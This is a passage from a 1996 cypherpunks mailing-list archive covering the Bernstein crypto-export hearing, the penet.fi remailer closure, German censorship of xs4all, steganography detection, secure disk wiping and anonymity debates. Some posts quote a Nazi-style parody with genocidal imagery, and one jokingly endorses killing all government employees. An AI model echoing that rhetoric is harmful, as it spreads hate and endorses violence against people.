Sep 14.] It's been eleven months to the day since our first hearings in Dan Bernstein's lawsuit against the NSA and State Department. At this hearing, starting at High Noon, we hope to convince Judge Marilyn Hall Patel to declare that the ITAR (export regulations) and AECA (export law) are unconstitutional. We are asking her to order the State Department to immediately stop enforcing them with respect to cryptographic software. Simultaneously, the government is asking her to declare that their actions have been completely legal and Constitutional, and to throw out our lawsuit. Judge Patel has asked both sides to fully explore all the legal issues in the case for this hearing, leaving aside any unresolved factual questions (like exactly how many people have had their exports denied). She plans to decide the questions: * Should the government's actions be examined under the "strict scrutiny" appropriate when they attempt to restrict speech, or under a looser "O'Brien" test that applies when the government seeks to restrict conduct and only incidentally restricts speech? * Is the ITAR Scheme a prior restraint on speech? * Does the ITAR Scheme impermissibly punish speech after the fact? * Is the ITAR Scheme too vague to constitutionally regulate speech? * Is the ITAR Scheme so broadly worded that it unconstitutionally limits speech protected by the First Amendment? * Were the government's actions as applied to Dan Bernstein unconstitutional restrictions on his First Amendment rights? It's possible, but unlikely, that the judge will decide some of this then-and-there. Instead, we will get some insights into how she is leaning, based on her questions and comments. Her written decision will come out some weeks or months later. She then plans to certify the case for immediate appeal to a higher court (the Ninth Circuit, also here in San Francisco), to confirm or deny her legal analysis. >From there it will probably go to the Supreme Court. Watch the wheels of justice grind! Meet the intrepid lawyers who are working hard to protect our rights! Shake hands with one or more NSA representatives specially flown in for the occasion! Meet some journalists and be quoted talking about crypto freedom! We will follow the hearing with a group lunch at Max's Opera Plaza, a block away at Van Ness Avenue and Golden Gate Avenue. As background, Dan Bernstein, ex-grad-student from UC Berkeley, is suing the State Department, NSA, and other agencies, with help from the EFF. These agencies restrained Dan's ability to publish a paper, as well as source code, for the crypto algorithm that he invented. We claim that their procedures, regulations, and laws are not only unconstitutional as applied to Dan, but in general. Full background and details on the case, including all of our legal papers (and most of the government's as well), are in the EFF Web archives at: http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case. Like Phil Karn's and Peter Junger's cases, this lawsuit really has the potential to outlaw the whole NSA crypto export scam. We intend to make your right to publish and export crypto software as well- protected by the courts as your right to publish and export books. It will probably take more years, and an eventual Supreme Court decision, to make it stick. But this is the hearing at which we plan to convince our judge that these laws really are unconstitutional. Her order restoring our legal right to publish crypto source code could come out by Christmas! Please make a positive impression on the judge. Show her -- by showing up -- that this case matters to more people than just the plaintiff and defendant. Demonstrate that her decision will make a difference to society. That the public and the press are watching, and really do care that she handles the issue well. We'll have to be quiet and orderly while we're in the courthouse. There will be no questions from the audience (that's us), and no photography, but the session will be tape-recorded and transcribed, and you can take notes if you like. The lobby guards will want to hold onto guns, "munitions", and even small pocketknives, before they'll let you go upstairs to the courtrooms. So, here's your excuse to put on a nice costume, take an early lunch, and pay a call on the inner sanctum of our civil rights. See you there! John Gilmore PS: If you can't come, you can still contribute. Join EFF's Legal Defense Fund; see http://www.eff.org/pub/Alerts/cyberlegal_fund_eff.announce. From jbugden at smtplink.alis.ca Fri Sep 6 11:29:18 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Sat, 7 Sep 1996 02:29:18 +0800 Subject: FW: Anonymous phone calls (was: What is the EFF doing exa... Message-ID: <9608068420.AA842032641@smtplink.alis.ca> Subject: FW: Anonymous phone calls (was: What is the EFF doing exactly?) There is another spin possible on the reasons for replacement of pay phones with credit card phones. In Canada all new credit card phones are also able to take phone cards (which are anonymous). Using a prepaid phone card permits full anonymity. But what it also permits is metered local calls. This infrastructure would be more familiar to someone from Europe where metered local calls are the norm. Paris made the change to phones that *only* take prepaid phone cards (thus fully anonymous) obstensibly because people were breaking into phones for the money. Prepaid phone cards avoid this as well as collection costs. James Why should my long distance calling subsidize your local internet access? ;-) ---------- From: "" Sent: Friday, September 06, 1996 9:54 AM To: unicorn at schloss.li Cc: vznuri at netcom.com; cypherpunks at toad.com Subject: Re: What is the EFF doing exactly? Not just DC and Chicago, I'm afraid. If anyone around NYC noticed, there are less and less payphones, and all new ones installed, just about, are those yellow credit card phones. Not all of them, but it's now one for one, at least. From moe-san at stadt.com Fri Sep 6 11:38:00 1996 From: moe-san at stadt.com (D. Moeller) Date: Sat, 7 Sep 1996 02:38:00 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: <32302DD6.43D3@stadt.com> Timothy C. May wrote: > > At 11:23 AM 9/5/96, Asgaard wrote: > Leftists are despicable. They steal our money, they corrupt our politics, > they nationalized our industries, they subvert our ideals, and they > undermine our national will. > The Democratic People's German Reich is fully justified in cutting off > contacts with subversive radical publications in Jew-dominated nations like > Holland. > As Reichskommander Schmidt points out: "The citizen-units who access > foreign Web sites will be rounded up and disposed of like the vermin they > are. We cannot allow the Revisionists and Leftists to triumph. We will send > them to the showers." > Heil Freeh! > --Klaus OK, I take the above as a sarcastic one. I took a longer view at the "to be blocked"-sites and to the declearation of the prosecutor. After all, I found the following facts: 1.) The mentioned URLs DO contain material, which is "description and tolerating/praising of a terroristic act", describing the sabotage of a public railroad-line by using means of inflammables and reprogramming railroad-signs. They also used some "explosive-warning"-signs in order to simulate a possible positioned bomb. 2.) The aforementioned IS a felony according to ruling german law. 3.) It is NOT depending if these articles are Leftist's, Rightist's or else. According to Germand Law, the Attorney General is in charge for ANY extremistic/terroristic contents of pamphlets, books, or any other source of information. 4.) As you might know, we had a very bad time dealing with Leftist-Terrorists some 10-20 years ago. Therefore I can understand, that there exists a certain "oversensibility" dealing with any form of public terror. 5.) The "advice", given to the german ISPs, is IMO a very poor try to transfer ruling law to the "new medium", which is, as we all know and still try to improve, beyond control of governmental agencies. As soon as our stupid politicians will be aware of what the net really is (which should take 2-4 years) they will understand also, that pressing ISPs to blocking sites is no way of dealing with the problem. 6.) I personally think, that every individual has the right to gain access to every source of information, in order to build a opinion on their own. 7.) CUT THAT SHOWER SHIT! I can't take it anymore - all the time through school and now I'm grown up and still have to deal with this shit, even by Herr May ;-). That's what I think - come and beat me up ;-) Cheers Moe! -- D. Moeller at WebLab U-Agency GmbH webadmin at stadt.com http://www.stadt.com/u-agency/ moe-san at elcafe.com http://www.elcafe.com/~moe-san/ From jya at pipeline.com Fri Sep 6 11:38:34 1996 From: jya at pipeline.com (John Young) Date: Sat, 7 Sep 1996 02:38:34 +0800 Subject: Co$ Buys EFF Message-ID: <199609061043.KAA16012@pipe1.t1.usa.pipeline.com> The New York Times, September 6, 1996, p. D2. Behind an Internet Message Service's Close Pressure From Church of Scientology Is Blamed for the Shutdown. A Finnish judge says different rules apply to E-mail. By Peter H. Lewis Pressure from the Church of Scientology International was at least partly responsible for the recent shutdown of a well-known Internet messaging service based in Helsinki, according to the Finnish operator of the service. The service, known by its Internet address, anon.penet.fi, was used by hundreds of thousands of people worldwide to send and receive electronic messages without divulging their true identities. It was the best known of a small, global network of special computers known as remailers, whose legitimate users include political dissidents, people with medical or drug ailments and others who want to communicate anonymously. Although previous news accounts had reported that the service was shut down because of accusations that it was a primary conduit for child pornography transmitted on the Internet, police investigators in Helsinki dismissed those accusations as groundless. The real reason for terminating the service, according to its founder and operator, Johan Helsingius, was a recent Helsinki court ruling that ordered him to reveal the true name of one of his system's users to the Church of Scientology. The judge held that under Finland's current telecommunications laws, Internet electronic mail does not carry the same privacy protections enjoyed by postal mail or telephone calls. The church, which in recent years has been trying to protect its copyrighted scriptures by trying to block their dissemination over computer networks, said an unknown person or persons had used the anon.penet.fi computer to illegally publish copyrighted church documents on Usenet, the global electronic bulletin board. Mr. Helsingius, a 35-year-old computer networking expert, has not yet revealed the name sought by the Scientologists, and said he planned to appeal the court ruling. But he said the court ruling opened the door for future subpoenas seeking the real names of anon.penet.fi users, and that he would rather close the system than spend all his time in court. Mr. Helsingius has operated anon.penet.fi for more than 3 years, handling over 7,000 messages a day. "In a sense I've done my pioneer work and it is now up to others to carry on," Mr. Helsingius said. Helena Kobrin, a Church of Scientology official, said the complaint against anon.penet.fi was just one of several actions the church had taken against the operators of remailer computers in Europe and the United States. She said the church has five lawsuits pending in the United States against remailer operators and users of remailers. "We have actively been in communication with various remailers about postings that have gone through their systems," said Ms. Kobrin, general counsel for the Religious Technology Center in Los Angeles, which is responsible for protecting the copyrights and trade secrets of unpublished Scientology scriptures. Earlier this year, another remailer, known as hacktic.nl, in the Netherlands, was shut down under pressure from the Scientologists. Unlike many other churches, the Church of Scientology, founded nearly 40 years ago by the science fiction author L. Ron Hubbard, regards its gospel as copyrighted material and a trade secret. Several courts have upheld the validity of the copyrights. Foes and critics of the church have used the Internet to publish the church documents, as well as other documents the church contends were stolen from its computers. The Religious Technology Center has also unsuccessfully attempted to put a stop to the forum on Usenet, alt.religion.scientology, where many of the copyrighted documents are published. A series of recent news articles in The Observer of London among others had linked the anon.penet.fi computer to accusations it was a conduit for child pornography. Mr. Helsingius, who has denied that his system is a conduit for child pornography, declined to speculate on the motives of the accusers. The accusations of child pornography first appeared several days after Mr. Helsingius declined to turn over to the court the name sought by the Scientologists. The Observer quoted Toby Tyler, identified as an adviser to the Federal Bureau of Investigation, as saying anon.penet.fi was the source for up to 90 percent of the child pornography on the Internet. But Richard P. (Toby) Tyler, a sergeant in the San Bernardino, Calif., County Sheriff's Department who said his involvement with the F.B.I. was minimal, said he was misquoted by the newspaper. Mr. Tyler, who has investigated pornography trafficking in cyberspace, said that most child pornography on the Internet did not pass through remailers. He did say, however, that of the small portion that does, 70 percent to 90 percent passes through anon.penet.fi. "I think that's a shame," Sergeant Tyler said upon learning that anon.penet.fi was closed. "I personally view its closing as a loss of freedom. I did not like the abuse of the remailer for child pornography, but I felt it served a necessary political purpose in this world." Ms. Kobrin of the Religious Technology Center said that despite its legal actions, the Church of Scientology does not oppose the operation of remailers, which are also known as anonymous servers. "We were not opposing the existence of his server," Ms. Kobrin said. "We have no opposition to there being anonymity for private, consensual communications. What we oppose is using anonymous servers for the purpose of permitting criminal or other unlawful acts. There has to be responsibility and accountability." [End] From nobody at cypherpunks.ca Fri Sep 6 12:01:59 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sat, 7 Sep 1996 03:01:59 +0800 Subject: 16oz packages In-Reply-To: <199609061201.IAA04873@nrk.com> Message-ID: <199609061523.IAA29080@abraham.cs.berkeley.edu> David Lesher writes: > > One is now instructed to take these packages to a post-office mail > > clerk for mailing. > > > > (Of course it's unclear just what would be done if a package > > weighing over that magical 16ozs was left in a mailbox) > > They get sent back. What happens if there is no return address, or the return address is in another state? Do they throw out the package? Do they open it? Do they have a bomb squad destroy it (could get expensive if a lot of 16 oz packages are incorrectly mailed). From zachb at netcom.com Fri Sep 6 12:04:07 1996 From: zachb at netcom.com (Z.B.) Date: Sat, 7 Sep 1996 03:04:07 +0800 Subject: Test...sorry about this Message-ID: I'm just posting this to see if there's something wrong with my mail filter - it dumped a ton of messages from this list over the night, and I'm trying to figure out why the !@%$# it did that. Sorry for the interruption. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From jimbell at pacifier.com Fri Sep 6 12:28:12 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 7 Sep 1996 03:28:12 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) Message-ID: <199609061607.JAA00624@mail.pacifier.com> At 10:08 AM 9/6/96 EST, jbugden at smtplink.alis.ca wrote: >There is another spin possible on the reasons for replacement of pay phones with >credit card phones. In Canada all new credit card phones are also able to take >phone cards (which are anonymous). Don't be too sure about the "anonymity" of these cards. You don't have to give your name when you buy or use them, but assuming a large number of phone calls (to, from different locations) can be associated together after the fact, your name can probably be fairly easily obtained. Jim Bell jimbell at pacifier.com From mycroft at actrix.gen.nz Fri Sep 6 13:03:33 1996 From: mycroft at actrix.gen.nz (Paul Foley) Date: Sat, 7 Sep 1996 04:03:33 +0800 Subject: Voluntary Disclosure of True Names In-Reply-To: <199609051749.KAA12335@netcom20.netcom.com> Message-ID: <199609061342.BAA24447@mycroft.actrix.gen.nz> On Thu, 05 Sep 96 10:49:39 -0700, "Vladimir Z. Nuri" wrote: I have seen it repeated here often that somehow anonymity is some kind of a "right" that one should have in all kinds of different & important transactions, not merely on "cyberspace debate societies". I see here frequently the implication that *private*entities* that want to enforce identity in their own transactions are somehow implementing a corrupt, orwellian system. it sounded to me like that was all Dyson was advocating. The only time I've ever seen this point of view expressed on the list is when you and the other tentacles claim someone else is wrong for saying it (which they didn't, of course). No one has ever said "private entities" shouldn't be allowed to "enforce identity in their own transactions." This is exactly what Tim and others have been saying _should_ happen. Dyson, however, appears to be advocating some sort of identity tracking mechanism at the network level so that _all_ transactions are identifiable (albeit with some legal mechanism attempting to prevent "unauthorised" identification) regardless of whether the individuals involved want to enforce identity or not. Identification can be proved between the individuals concerned on a truly voluntary basis, without any such controls on the net. also, I think you are being slightly disingenuous in masking your own and other cpunks major objections to traceability, with the above, "this is all we really want". what about situations where the government requires you to give a physical identity for some kind of a license etc? do you think there are no such valid situations? is there any role for a government whatsoever in CryptoAnarchist Utopia and if so, is there any situation in which demanding physical identity is reasonable? If the government, or any other entity, requires identification it can be provided. I'm hard pressed to think of a situation in which the legitimate business of government (if any) actually requires identification. What do we need government to licence? -- Paul Foley --- PGPmail preferred PGP key ID 0x1CA3386D available from keyservers fingerprint = 4A 76 83 D8 99 BC ED 33 C5 02 81 C9 BF 7A 91 E8 ---------------------------------------------------------------------- Paradise is exactly like where you are right now ... only much, much better. -- Laurie Anderson From jimbell at pacifier.com Fri Sep 6 13:05:37 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 7 Sep 1996 04:05:37 +0800 Subject: Conservation Laws, Money, Engines, and Ontology (fwd) Message-ID: <199609061607.JAA00614@mail.pacifier.com> At 01:46 AM 9/6/96 -0400, Donald E. Eastlake 3rd wrote: >Suggest you look at draft-eastlake-internet-payment-*.txt in the >IETF shadow directories. I don't think any one step will solve all >our spam problems but I wouldn't mind spending, say, 5 cents for each >real piece of mail I sent outside my company and if end machines charged >5 cents per piece of ouside mail received, I think spamming would be >crippled. (Note that with bad guy lists, you could collect the money and >then just throw away the mail.) Assuming we all agree that we're moving from a paper-based mail system to email, it is logical that "junk mail" will move as well. As I recall, statistics show that the average cost of a piece of junk mail is about $1 or so, including postage, printing, etc. It occurred to me a while back (and this proposal appears to be at least approximated by other proposals around here) that since companies are already saving a dollar, they should use some of those savings to "bribe" Internet-users into reading those (commercial) messages. Don't bother with all the details on how to verify this, just include digital cash along with the message, to be credited automatically to the recipient. Assuming the average Internet user already pays about $15 per month for access, he would only have to receive 2 emails a day which pay him 25 cents per, to pay for this service. At that point, his Internet access would be free, at least somewhat analogous to free TV which is paid for by commercials. Everybody's ahead, except for the postman, the printer, etc. Jim Bell jimbell at pacifier.com From jk at stallion.ee Fri Sep 6 13:16:48 1996 From: jk at stallion.ee (=?ISO-8859-1?Q?J=FCri_Kaljundi?=) Date: Sat, 7 Sep 1996 04:16:48 +0800 Subject: electronic offshore banking Message-ID: Are there any good offshore banks that would allow you to use your account over the Internet? I know European Union Bank www.eub.com is on of those available, but their US$ 25.000 minimum deposit is too stupid. J�ri Kaljundi AS Stallion jk at stallion.ee From tcmay at got.net Fri Sep 6 13:32:07 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 7 Sep 1996 04:32:07 +0800 Subject: Reputations Message-ID: At 1:11 AM 9/6/96, Greg Burk wrote: >> I strongly disagree. It's quite possible for Person A to quickly convert >> his reputation to Person B to a _negative_ value. Real quick, in fact. > >I don't see how there can be such a thing as negative reputation >capital. Wouldn't that mean B believes the opposite of what A says? If >you anti-believed someone in a consistent manner, couldn't they exploit >that? Well, I suppose that if you don't believe in negative repuation capital, I'm not going to be able to spend enough time to convince you. It's like someone saying they're not sure such a thing as "entropy" exists. >For instance, when a certain infamously-low-reputation (deservedly so) >individual recently joined the cypherpunk lists, others who had endured >him in the past tried to relay their impressions of him. It proved very >difficult to convey, and they were somewhat attacked for their efforts >and not entirely believed. > >In other words, he *could not* spend down to 0, despite years of >unflagging effort. No, with many of the list members, his reputation was in fact negative. They disbelieved nearly anything he had to say, and his approval of some idea was largely cause for others to take the opposite tack. About as clear an example of a negative reputation as one can find. (Note that I am not saying his reputation is negative with _me_.) >I've already made the points I wanted to make, so I may not have further >comments. Nor me. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jehill at gauss.elee.calpoly.edu Fri Sep 6 14:06:09 1996 From: jehill at gauss.elee.calpoly.edu (Joshua E. Hill) Date: Sat, 7 Sep 1996 05:06:09 +0800 Subject: Steganography -- Tell Tale Signs? In-Reply-To: Message-ID: <199609061702.KAA02054@hyperion.boxes.org> > 1) If I hide some PGP encrypted data in a > gif, jpg or wav file will there be any tell tale > signs to the naked eye of an expert? If yes, > what are they? naked eye: no... but if an expert is looking (for any reason) they would probably check out the low order bits, regardless... and although the actual message appears random, PGP has some headers which are _defiantly_ not random... In fact, they are trivial to check for. Look for Stealth- PGP (A separate product for now... to be integrated with PGP 3.0) The idea behind Stealth-PGP is that there are no headers... so the entire data stream is random... > 3) Are there any tools at the moment > to expose (not crack) the hidden encrypted > data? If none. are there tools in development? sure enough... There are several rather accepted stego formats... If they can use one of the known forms of stego, and extract a PGP-looking message, you are going to be hard pressed to "plausibly deny" anything. If you _do_ use Stealth-PGP (or some other raw encryption method), the low ordered bits would appear to be random... Now, I'm not certain about this, but I doubt that the low order bits of any given regular file are really as random as a good crypto algorithm is. I'd imagine that there are ways of statisticly analyzing the low order bits of a file, and seeing if they're random... If they are completely random, then there is probably something hidden there... and if they are completely ordered, then there is probably something hidden there... In the "next generation" stego tools, there will probably be options to hide data in noise that looks similar to the native noise of the medium... a sort of subliminal channel in the noise (more so than regular stego). Until then you'll have to rely on "gee... what do you mean 'completely random'" ;-) Joshua -----------------------------Joshua E. Hill----------------------------- | LAWS OF COMPUTER PROGRAMMING: | | X. Adding manpower to a late software project makes it later. | -------jehill@.calpoly.edu-------- From jad at dsddhc.com Fri Sep 6 14:06:57 1996 From: jad at dsddhc.com (John Deters) Date: Sat, 7 Sep 1996 05:06:57 +0800 Subject: What the NSA is patenting Message-ID: <2.2.32.19960906165918.0073d060@labg30> At 01:26 AM 9/3/96 -0500, Bruce Schneier wrote: >I just spent a pleasant hour or so searching a patent database for all >patents assigned to the NSA. There's some interesting stuff: > > "Self-locking, tamper-evident package" > Method of retrieving documents that concern the same topic" > >Fifty-Four patents total. (Used to be they just kept stuff secret; now >they patent some of it.) Attached is the most interesting thing I found: a >patent on techniques for reading data off overwritten magnetic media. > >Bruce [ Interesting patent deleted ] This method implies that they have the ability to scan the entire platter surface at resolution level that is basically atomic. >From lots of experience gained from working with metalworking machinery, it sounds like some of the old magnetic data might be leaving traces behind by a process called "backlash". It happens because machines don't realign themselves precisely, unless the lead-in steps are repeated every time. A fairly simple demonstration of this can be found on most dot-matrix printers. They usually have a mode called "uni-directional" printing, where the printhead puts dots on the paper only when travelling from left-to-right. This is used to improve the quality of a graphic image. Print a simple pattern of repeating vertical bars (||||||) across the page and down several lines with this mode turned off, and you'll probably notice the lines tend to not line up perfectly. Turn uni-directional printing on, and watch the behavior of the printhead. It will "home" itself to the far left side before printing the next line of bars. The bars will then be lined up "better" than in the bi-directional print. We should be able to use this feature to our advantage to write a "backlash- enhanced" wipedisk driver. The wipedisk utilities I've seen today primarily consist of repeatedly writing a pattern such as 0x55555555, then 0xAAAAAAAA, then 0xFFFFFFFF, then 0x00000000. While this will probably eradicate most of the traces of the original data, it's all happening "unidirectionally" -- starting at the first sector of the file, write this data till all the sectors have been overwritten. Given that the original data may have been written in reverse sector order, or reverse cylinder motion order, or after a large cylinder change, the wipedisk might still leave traces remaining on the disk. Using the above example of printing vertical bars, imagine having each line print three times using the unidirectional mode, and randomly picking one line out of the entire array to print bi-directionally. It'll stand out like a sore thumb. That's what I think they're looking for with their data recovery method. What would probably make for a more secure wipe utility would be to alter the "head approach path" prior to making each of the passes described above. So, before overwriting the sectors in order from 0 to EOF full of 0x55555555s, have the head move to the 0th cylinder first. Before overwriting the sectors in order from 0 to EOF with 0xAAAAAAAAs, have the head move to the last cylinder beforehand. Repeat for the 0xFFFFFFFF and 0x00000000 sectors, except overwrite the sectors in order from EOF to 0. All this pre-writing motion could theoretically reduce the repeatability of the drive head positioning arm as well as possibly hitting different rotational sync points, using the backlash effect to its fullest extent. Of course, the biggest problem will be that of overcoming intelligent disk controllers. No self-respecting SCSI drive is going to voluntarily swing the disk head around inefficiently, and I don't know enough about how IDE works to say anything different about it. I hope some hardware hacker who knows their low-level stuff will be able to write a secure disk wiper. John -- J. Deters "Captain's log, stardate 25970-point-5. I am nailed to the hull." +-------------------------------------------------------+ | NET: jad at dsddhc.com (work) jad at pclink.com (home) | | PSTN: 1 612 375 3116 (work) 1 612 894 8507 (home) | | ICBM: 44^58'36"N by 93^16'27"W Elev. ~=290m (work) | | PGP Key ID: 768 / 15FFA875 | +-------------------------------------------------------+ From kadafi at netcom.com Fri Sep 6 14:07:48 1996 From: kadafi at netcom.com (Flying insect killer) Date: Sat, 7 Sep 1996 05:07:48 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) In-Reply-To: <199609061607.JAA00624@mail.pacifier.com> Message-ID: On Fri, 6 Sep 1996, jim bell wrote: > At 10:08 AM 9/6/96 EST, jbugden at smtplink.alis.ca wrote: > >There is another spin possible on the reasons for replacement of pay phones with > >credit card phones. In Canada all new credit card phones are also able to take > >phone cards (which are anonymous). > > Don't be too sure about the "anonymity" of these cards. You don't have to > give your name when you buy or use them, but assuming a large number of > phone calls (to, from different locations) can be associated together after > the fact, your name can probably be fairly easily obtained. > Jim Bell > jimbell at pacifier.com And phone companys that offers phone cards keep track of every call that goes thru each card number. From wendigo at pobox.com Fri Sep 6 14:18:22 1996 From: wendigo at pobox.com (Mark Rogaski) Date: Sat, 7 Sep 1996 05:18:22 +0800 Subject: [NOISE] Neo-Nazis etc. In-Reply-To: <322F9867.7FEF@gte.net> Message-ID: <199609061711.NAA05404@charon.gti.net> -----BEGIN PGP SIGNED MESSAGE----- An entity claiming to be Dale Thorn wrote: : : Try to keep in mind that "Nazis" aren't skinheads and other : troublemakers exactly, which is to say, those are the first people : Hitler got rid of when he came to power. : : Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we : know anyone like that? : Reminded me of the following: "You think swastikas are cool. The real Nazis run your school; They're coaches, businessmen, and cops. In a real Fourth Reich, you'd be the first to go." -- Dead Kennedys "Nazi Punks F*** Off" mark - -- Mark Rogaski | Why read when you can just sit and | Member GTI System Admin | stare at things? | Programmers Local wendigo at gti.net | Any expressed opinions are my own | # 0xfffe wendigo at pobox.com | unless they can get me in trouble. | APL-CPIO -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMjBbCBz4pZwIaHjdAQFpFQf+IyNTMUhb446jVw2+GNTF6Fy1EzvNZMoz 8xm12TdfxNH9z66zvd0cpNoVC2r3HrRwadj4j43UuDsFsc+AzUDNm7cKjiqTzhDi hY+M8colZUI+5qMEvYmgUHPZn008CPdr5slGxOEDe6Pj7jjwF1ePMXQfgpoa09ZJ xJ2YNI20Xglt+4+S9bE+XY43y+YuPsKz7LqF9nyaM4ENsq1k8myt2xPvuKZSAVd/ B6Jgh3NUgiuSxBQDj1f1+12TAllW5Mp7HAq74SF4G0JcvXQmkrNh43fbPLLVVzch vJC9KD3ldOoqPs6ykxdjtfR/T1iCaBRqcclhc34TnNTRBNU/j8YKJA== =mHK8 -----END PGP SIGNATURE----- From jimbell at pacifier.com Fri Sep 6 14:22:41 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 7 Sep 1996 05:22:41 +0800 Subject: Race Bit: C Message-ID: <199609061750.KAA06787@mail.pacifier.com> At 05:05 AM 9/6/96 +0000, jonathon wrote: >On Thu, 5 Sep 1996, jim bell wrote: > >> The way I see it, the status quo doesn't come "pre-justified": It needs >> just as much a defense as any other proposal. Its main advantage is that it >> tends to be more understood that most hypotheticals, because it's been > >More understood, and just more accepted, because alternatives >are hard to conceive, and even harder to popularize, without >lots of red liquid running in the streets? Since red liquid running in the streets is generally so reviled, one of the things which mystifies me is why there aren't more simulation-type programs used to test out hypotheticals, for example a "SimEconomy." For example, you'll occasionally hear about a media news organization gathering a dozen or so volunteers in a room, and asking them to solve a problem like "The Budget Deficit" or some such. The result of their interplay is generally used to explain why these problems are hard to solve. I, for one, would love to be able to program in an immediate 25%+ reduction in military spending (added to that a 5%/year cumulative cut after that for 10+ years), a 5% cut then a cap on Socialist Insecurity, 5% per year (cumulative,for 10 years) of reduction in welfare, along with similarly substantial cuts/caps in Medicare and a few other features. Obviously, a computer-based simulation wouldn't just blindly do the cuts, but would also estimate the secondary and tertiary effects of such cuts, for example spending in areas whose economies are traditionally dependant on defense programs, etc. I'm not saying that I think these changes would be _easy_, politically, but if the average citizen were made aware of how simple the changes were, he'd be less tolerant of special-interest politics. > On second thoughts, let's just terminate > with extreme prejudice, each and every individual > who has worked in any capacity for any part of any > government agency in the us -- regardless of whether it > was federal, state or local, and regardless of whether > they were president, janitor, or clerk. > All people in the employ of government agencies are death-dealers. I hope you don't expect me to argue with this B^) Jim Bell jimbell at pacifier.com From tcmay at got.net Fri Sep 6 14:30:54 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 7 Sep 1996 05:30:54 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL Message-ID: At 8:18 AM 9/6/96, tank wrote: >Please forward: > * * * P R E S S R E L E A S E * * * > > >GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL, WITH 3100 WEBPAGES > > >German internetproviders, joined in the Internet Content Taskforce >(ICTF), started censoring the Dutch website www.xs4all.nl, containing >3100 personal and commercial homepages. This act of censorship is >caused by the webpage of a magazine that is banned in Germany, Radikal >(http://www.xs4all.nl/ ~tank/radikal/). ... Though my German friends will perhaps feel I am picking on them, this is not so (this week Germany is in the hot seat, last week it was Singapore....). A Modest Proposal: * as Germany is bent on blocking sites which carry this subversive pamphlet, "Radikal," let us mirror it on thousands of sites around the world. * when the Germans went into Danmark and insisted Jews wear badges, ordinary citizens (and the Danish Royal Family, as I recall) also took to wearing these Star of David badges. * wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now attached to so many pages were to be joined by a "Star of David"? This Star of David symbol could mean "We support freedom to read, and our site contains the "Radikal" publication which Germans are forbidden to access." (I know nothing of how such symbolic campaigns are actually launched and managed, so I'm suggesting the hint of an idea. I do think mirroring the banned publication (_any_ banned publication, by _any_ government) on as many sites as possible is a Good Idea.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Fri Sep 6 14:35:42 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 7 Sep 1996 05:35:42 +0800 Subject: "The Bill of Rights can be dangerous...." Message-ID: At 2:30 PM 9/5/96, Omegaman wrote: >What strikes me as odd is that the arguments against anonymous >communication are nearly identical to those against strong crypto. >ie. the same four horsemen flare up in these discussions. Yet we >have parties who are ostensibly pro-crypto but anti-anonymity. > >To put it in a nutshell, in a free society I can have a private >conversation, but I must essentially announce that I am having one >and who I am having that conversation with? As with Adam Back's mini-rant yesterday, this is exactly correct. In a free society, speech need not be approved, registered, escrowed, labelled, or identified with the Registered True Name of the speaker. One can paraphrase Esther Dyson's concerns about anonymity in several fairly equivalent forms. Here's the original: "Anonymity can be dangerous -- as can traceability, especially in/by repressive regimes. Therefore I would favor allowing anonymity -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." Here's a slightly paraphrased version for freedom to read anonymously, with some "reasons" included in brackets: "Books and magazines can be dangerous [bomb recipes, racial hatred, instilling bad values, etc.]-- as can restrictions on reading, especially in/by repressive regimes. Therefore I would favor allowing unfettered reading -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." (i.e., "book escrow," where one's reading materials are escrowed with Trusted Authorities, and only accessed by law enforcement under Proper Conditions. Failure to escrow reading materials would be a Class B felony. Cf. the FBI's Library Awareness Program of circa 1987-8.) A version for freedom of movement: "People moving around can be dangerous [avoiding parental responsibilities, avoiding taxes, spying, plotting to bomb buildings]-- as can traceability, especially in/by repressive regimes. Therefore I would favor allowing freedom of movement -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." (a la the "position escrow system" I predicted a couple of years ago would someday be seriously considered) A version for freedom of association: "Freedom of association can be dangerous [plotting of crimes, gathering of mobs, spread of dangerous ideas, disease]-- as can restrictions on such gatherings, especially in/by repressive regimes. Therefore I would favor allowing freedom of association -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." ("Club escrow"? All mailing lists, clubs, associations, and such would have to escrow an up-to-date list of members, associates, and contacts. Then, with proper authorization by proper authorities, law enforcement could inspect these lists to see who had been meeting with whom. Hotels would have to monitor use of rooms by more than two persons (the two person case is already covered by the "Sex can be dangerous..." variant of the Dyson Principle).) A version for anonymous purchases and sales: "Anonymity in sales and purchases can be dangerous [bomb materials, stolen goods, unhealthful foods, etc.] -- as can traceability, especially in/by repressive regimes. Therefore I would favor allowing anonymous purchases and sales of goods -- with some form of traceability only under terms considerably stronger than what are generally 